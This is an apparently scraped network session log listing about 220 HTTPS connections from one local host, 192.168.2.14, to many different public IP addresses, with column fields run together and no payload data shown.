                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15436192.168.2.1435030169.172.171.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15437192.168.2.1434050108.103.175.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15438192.168.2.1447898149.71.69.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15439192.168.2.143837638.209.236.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15440192.168.2.1442672161.10.140.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15441192.168.2.1443296152.205.193.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15442192.168.2.1439850146.105.107.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15443192.168.2.1440778140.59.138.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15444192.168.2.143837259.53.179.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15445192.168.2.1443472213.242.142.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15446192.168.2.1447026102.175.134.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15447192.168.2.144934824.77.62.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15448192.168.2.1436796164.233.142.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15449192.168.2.1433912168.177.46.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15450192.168.2.143905443.103.234.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15451192.168.2.145629419.110.241.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15452192.168.2.144248637.19.23.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15453192.168.2.1448786148.162.117.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15454192.168.2.1434094156.60.130.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15455192.168.2.1456878148.232.208.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15456192.168.2.1439748157.58.97.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15457192.168.2.146081685.177.66.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15458192.168.2.1450096189.176.72.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15459192.168.2.143934280.85.70.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15460192.168.2.1433464174.81.254.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15461192.168.2.1452726217.176.113.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15462192.168.2.144646695.221.200.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15463192.168.2.144519617.67.236.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15464192.168.2.1457904183.68.7.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15465192.168.2.1456090144.13.134.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15466192.168.2.1445586119.200.41.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15467192.168.2.1451396149.149.188.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15468192.168.2.1436706177.78.190.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15469192.168.2.143960473.185.165.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15470192.168.2.1436160212.122.160.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15471192.168.2.1439498195.221.6.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15472192.168.2.1457498143.123.46.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15473192.168.2.1459556152.96.150.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15474192.168.2.1438238128.8.95.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15475192.168.2.1452972131.90.27.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15476192.168.2.14454084.184.81.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15477192.168.2.144959240.38.58.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15478192.168.2.1436716107.90.83.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15479192.168.2.1444020168.49.88.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15480192.168.2.144699613.69.110.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15481192.168.2.1434572102.44.97.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15482192.168.2.145565832.59.221.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15483192.168.2.1451098181.163.103.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15484192.168.2.1448698191.136.130.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15485192.168.2.1445632181.215.52.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15486192.168.2.1449018161.128.227.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15487192.168.2.144368466.77.226.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15488192.168.2.144195672.37.172.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15489192.168.2.1444576138.104.171.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15490192.168.2.1445834112.100.232.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15491192.168.2.1448460133.118.61.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15492192.168.2.1438704167.243.121.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15493192.168.2.1441912136.201.233.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15494192.168.2.145353259.25.250.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15495192.168.2.144401039.254.244.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15496192.168.2.1438386156.117.15.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15497192.168.2.1436672120.76.242.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15498192.168.2.144700040.136.215.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15499192.168.2.145618220.121.212.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15500192.168.2.1454374145.48.94.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15501192.168.2.1435572196.78.192.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15502192.168.2.143846812.84.22.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15503192.168.2.143304276.118.123.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15504192.168.2.1437408117.31.167.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15505192.168.2.145569438.235.112.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15506192.168.2.143623844.216.60.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15507192.168.2.143667266.190.190.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15508192.168.2.144586447.54.166.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15509192.168.2.143807239.228.154.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15510192.168.2.1439446120.167.52.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15511192.168.2.1435812222.251.203.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15512192.168.2.1446264172.190.140.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15513192.168.2.144190424.45.96.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15514192.168.2.1445816194.8.148.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15515192.168.2.145788289.221.114.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15516192.168.2.1436488140.15.34.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15517192.168.2.1442390181.3.190.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15518192.168.2.1433922165.139.78.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15519192.168.2.144492286.174.171.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15520192.168.2.1439420208.124.38.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15521192.168.2.143658261.17.243.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15522192.168.2.1437934202.224.250.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15523192.168.2.1448724117.129.176.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15524192.168.2.1442362157.193.39.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15525192.168.2.1460044158.75.145.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15526192.168.2.1451880191.112.81.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15527192.168.2.143457288.167.86.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15528192.168.2.144426899.154.107.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15529192.168.2.1434990103.125.15.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15530192.168.2.1447538108.129.201.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15531192.168.2.1454170108.46.176.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15532192.168.2.1441032177.182.186.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15533192.168.2.1434670187.13.97.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15534192.168.2.1447268177.62.32.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15535192.168.2.145867264.250.247.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15536192.168.2.1444436165.212.138.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15537192.168.2.1434700130.122.232.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15538192.168.2.1449272145.246.13.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15539192.168.2.145304850.82.239.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15540192.168.2.1447938199.128.80.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15541192.168.2.1439706194.181.42.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15542192.168.2.14453248.251.41.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15543192.168.2.1444666199.52.60.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15544192.168.2.144358219.40.2.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15545192.168.2.145147024.228.149.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15546192.168.2.1460832174.165.253.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15547192.168.2.14603441.133.184.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15548192.168.2.1454344177.111.48.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15549192.168.2.143494695.158.113.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15550192.168.2.1456060108.100.151.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15551192.168.2.1437548165.72.28.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15552192.168.2.1452842218.137.140.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15553192.168.2.144521432.86.44.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15554192.168.2.1456544106.192.56.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15555192.168.2.1446868151.86.10.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15556192.168.2.143876239.84.13.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15557192.168.2.1459676193.213.238.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15558192.168.2.145653045.119.52.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15559192.168.2.1438670181.230.49.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15560192.168.2.144833437.157.217.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15561192.168.2.144267894.79.183.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15562192.168.2.1438382199.28.181.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15563192.168.2.144205048.183.201.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15564192.168.2.1457552123.31.133.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15565192.168.2.1450924204.244.159.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15566192.168.2.1436060112.251.171.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15567192.168.2.1437088106.251.213.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15568192.168.2.1456814195.224.99.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15569192.168.2.1452436165.57.1.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15570192.168.2.1441610221.13.115.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15571192.168.2.1457172138.231.150.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15572192.168.2.143412854.165.19.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15573192.168.2.144623842.231.56.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15574192.168.2.144111262.126.240.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15575192.168.2.1442454219.198.15.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15576192.168.2.1455750154.102.124.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15577192.168.2.1441162165.173.22.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15578192.168.2.144313499.156.178.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15579192.168.2.1440174122.76.168.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15580192.168.2.1433282217.166.22.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15581192.168.2.1437936104.51.42.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15582192.168.2.1445498205.177.37.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15583192.168.2.143786096.249.1.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15584192.168.2.1454926183.149.60.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15585192.168.2.1433160180.76.19.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15586192.168.2.144964241.226.51.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15587192.168.2.1438164169.248.50.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15588192.168.2.145190251.194.75.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15589192.168.2.1445388147.131.206.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15590192.168.2.1459322221.205.16.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15591192.168.2.145975265.136.90.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15592192.168.2.145218661.137.70.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15593192.168.2.1457994142.141.213.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15594192.168.2.1439688130.71.238.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15595192.168.2.144611452.64.72.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15596192.168.2.144719079.86.66.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15597192.168.2.1458064120.119.182.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15598192.168.2.1433318105.174.239.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15599192.168.2.144667849.119.212.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15600192.168.2.143841242.183.7.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15601192.168.2.143801067.29.243.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15602192.168.2.143618891.39.195.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15603192.168.2.1445648206.19.87.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15604192.168.2.145334034.118.204.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15605192.168.2.1444934147.67.235.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15606192.168.2.1459372212.227.201.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15607192.168.2.144077078.120.91.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15608192.168.2.1458644121.28.139.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15609192.168.2.144729883.140.164.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15610192.168.2.1433142212.148.229.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15611192.168.2.145596649.178.216.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15612192.168.2.144726651.224.166.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15613192.168.2.143977620.21.225.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15614192.168.2.1458206154.13.88.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15615192.168.2.145284663.130.244.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15616192.168.2.1442230129.210.145.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15617192.168.2.144983889.33.118.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15618192.168.2.1436556191.210.199.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15619192.168.2.1433230131.53.226.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15620192.168.2.144154648.58.250.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15621192.168.2.145487677.114.198.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15622192.168.2.145302687.8.137.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15623192.168.2.144960661.7.197.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15624192.168.2.143697039.55.6.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15625192.168.2.1443540157.146.139.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15626192.168.2.144303827.114.104.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15627192.168.2.1443610191.138.145.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15628192.168.2.1458824203.124.122.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15629192.168.2.145477890.38.134.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15630192.168.2.14442989.143.77.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15631192.168.2.1437186169.162.240.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15632192.168.2.1440484191.180.242.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15633192.168.2.144647480.194.57.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15634192.168.2.143860431.139.242.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15635192.168.2.1449856165.198.33.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15636192.168.2.1451956138.33.20.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15637192.168.2.145969662.83.163.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15638192.168.2.1438340122.168.114.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15639192.168.2.1453826140.18.205.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15640192.168.2.1444882118.50.82.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15641192.168.2.1460256168.184.221.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15642192.168.2.144319065.16.241.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15643192.168.2.1458232158.250.23.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15644192.168.2.144378682.96.101.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15645192.168.2.1456558142.149.240.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15646192.168.2.1458640108.192.106.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15647192.168.2.1443456120.38.229.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15648192.168.2.143789431.201.211.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15649192.168.2.143663499.48.183.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15650192.168.2.145243860.135.173.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15651192.168.2.14587844.240.45.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15652192.168.2.1443916213.214.213.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15653192.168.2.1442300138.205.226.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15654192.168.2.1439636213.106.108.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15655192.168.2.1437278183.30.52.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15656192.168.2.1460216173.215.7.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
